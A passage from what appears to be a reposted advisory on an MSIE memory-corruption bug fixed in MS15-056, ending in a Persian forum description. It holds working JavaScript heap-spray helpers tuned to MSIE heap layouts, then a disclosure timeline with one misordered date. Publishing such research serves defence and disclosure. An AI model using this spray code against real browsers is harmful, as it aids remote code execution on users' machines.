overlaps BSTR size dword."); var uCharIndex = uByteOffset / 2 - 2; if (uCharIndex == this.length - 1) throw new Error("uByteOffset (" + uByteOffset.toString(16) + ") overlaps BSTR terminating NULL."); return this.substr(0, uCharIndex) + String.fromDWord(uValue) + this.substr(uCharIndex + 2); } sprayHeap.js: console = window.console || {"log": function(){}}; function bad(pAddress) { // convert a valid 32-bit pointer to an invalid one that is easy to convert // back. Useful for debugging: use a bad pointer, get an AV whenever it is // used, then fix pointer and continue with exception handled to have see what // happens next. return 0x80000000 + pAddress; } function blanket(dSpray_dwValue_pAddress, pAddress) { // Can be used to store values that indicate offsets somewhere in the heap // spray. Useful for debugging: blanket region, get an AV at an address // that indicates where the pointer came from. Does not overwrite addresses // at which data is already stored. for (var uOffset = 0; uOffset < 0x40; uOffset += 4) { if (!((pAddress + uOffset) in dSpray_dwValue_pAddress)) { dSpray_dwValue_pAddress[pAddress + uOffset] = bad(((pAddress & 0xFFF) << 16) + uOffset); } } } var guSprayBlockSize = 0x02000000; // how much fragmentation do you want? var guSprayPageSize = 0x00001000; // block alignment. // Different versions of MSIE have different heap header sizes: var sJSVersion; try{ /*@cc_on @*/ sJSVersion = eval("@_jscript_version"); } catch(e) { sJSVersion = "unknown" }; var guHeapHeaderSize = { "5.8": 0x24, "9": 0x10, // MSIE9 "unknown": 0x10 }[sJSVersion]; // includes BSTR length var guHeapFooterSize = 0x04; if (!guHeapHeaderSize) throw new Error("Unknown script version " + sJSVersion); function createSprayBlock(dSpray_dwValue_pAddress) { // Create a spray "page" and store spray data at the right offset. var sSprayPage = "\uDEAD".repeat(guSprayPageSize >> 1); for (var pAddress in dSpray_dwValue_pAddress) { sSprayPage = sSprayPage.replaceDWord(pAddress % guSprayPageSize, dSpray_dwValue_pAddress[pAddress]); } // Create a spray "block" by concatinated copies of the spray "page", taking into account the header and footer // used by MSIE for larger heap allocations. var uSprayPagesPerBlock = Math.ceil(guSprayBlockSize / guSprayPageSize); var sSprayBlock = ( sSprayPage.substr(guHeapHeaderSize >> 1) + sSprayPage.repeat(uSprayPagesPerBlock - 2) + sSprayPage.substr(0, sSprayPage.length - (guHeapFooterSize >> 1)) ); var uActualSprayBlockSize = guHeapHeaderSize + sSprayBlock.length * 2 + guHeapFooterSize; if (uActualSprayBlockSize != guSprayBlockSize) throw new Error("Assertion failed: spray block (" + uActualSprayBlockSize.toString(16) + ") should be " + guSprayBlockSize.toString(16) + "."); console.log("createSprayBlock():"); console.log(" sSprayPage.length: " + sSprayPage.length.toString(16)); console.log(" uSprayPagesPerBlock: " + uSprayPagesPerBlock.toString(16)); console.log(" sSprayBlock.length: " + sSprayBlock.length.toString(16)); return sSprayBlock; } function getHeapBlockIndexForAddress(pAddress) { return ((pAddress % guSprayPageSize) - guHeapHeaderSize) >> 1; } function getSprayBlockCount(dSpray_dwValue_pAddress, pStartAddress) { pStartAddress = pStartAddress || 0; var pTargetAddress = 0x0; for (var pAddress in dSpray_dwValue_pAddress) { pTargetAddress = Math.max(pTargetAddress, pAddress); } uSprayBlocksCount = Math.ceil((pTargetAddress - pStartAddress) / guSprayBlockSize); console.log("getSprayBlockCount():"); console.log(" pTargetAddress: " + pTargetAddress.toString(16)); console.log(" uSprayBlocksCount: " + uSprayBlocksCount.toString(16)); return uSprayBlocksCount; } function sprayHeap(dSpray_dwValue_pAddress, pStartAddress) { var uSprayBlocksCount = getSprayBlockCount(dSpray_dwValue_pAddress, pStartAddress); // Spray the heap by making copies of the spray "block". var asSpray = new Array(uSprayBlocksCount); asSpray[0] = createSprayBlock(dSpray_dwValue_pAddress); for (var uIndex = 1; uIndex < asSpray.length; uIndex++) { asSpray[uIndex] = asSpray[0].clone(); } return asSpray; } Time-line 13 October 2012: This vulnerability was found through fuzzing. 29 October 2012: This vulnerability was submitted to EIP. 18 November 2012: This vulnerability was submitted to ZDI. 27 November 2012: EIP declines to acquire this vulnerability because they believe it to be a copy of another vulnerability they already acquired. 7 December 2012: ZDI declines to acquire this vulnerability because they believe it not to be exploitable. During the initial report detailed above, I did not have a working exploit to prove exploitability. I also expected the bug to be fixed soon, seeing how EIP believed they already reported it to Microsoft. However, about two years later, I decided to look at the issue again and found it had not yet been fixed. Apparently it was not the same issue that EIP reported to Microsoft. So, I decided to try to have another look and developed a Proof-of-Concept exploit. April 2014: I start working on this case again, and eventually develop a working Proof-of-Concept exploit. 6 November 2014: ZDI was informed of the new analysis and reopens the case. 15 November 2014: This vulnerability was submitted to iDefense. 16 November 2014: iDefense responds to my report email in plain text, potentially exposing the full vulnerability details to world+dog. 17 November 2014: ZDI declines to acquire this vulnerability after being informed of the potential information leak. 11 December 2012: This vulnerability was acquired by iDefense. The accidentally potential disclosure of vulnerability details by iDefense was of course a bit of a disappointment. They reported that they have since updated their email system to automatically encrypt emails, which should prevent this from happening again. 9 June 2015: Microsoft addresses this vulnerability in MS15-056. 6 December 2016: Details of this vulnerability are released. -->

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...